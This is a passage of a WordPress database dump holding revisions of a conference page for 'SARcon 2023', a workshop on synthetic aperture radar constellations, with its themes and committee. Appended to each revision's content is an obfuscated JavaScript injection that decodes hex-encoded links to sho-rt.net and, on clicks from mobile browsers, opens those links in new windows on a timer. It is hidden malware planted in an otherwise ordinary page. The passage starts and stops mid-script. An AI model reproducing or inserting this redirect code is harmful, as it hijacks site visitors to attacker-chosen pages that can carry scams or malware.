_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 17:06:57','2022-10-13 17:06:57','',2736,'https://gsw2023.com/?p=2753',0,'revision','',0),
(2754,1,'2022-10-13 17:16:06','2022-10-13 17:16:06','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team number=\"4\" orderby=\"author\" order=\"asc\" category=\"w11\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 17:16:06','2022-10-13 17:16:06','',2736,'https://gsw2023.com/?p=2754',0,'revision','',0),
(2755,1,'2022-10-13 17:17:19','2022-10-13 17:17:19','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 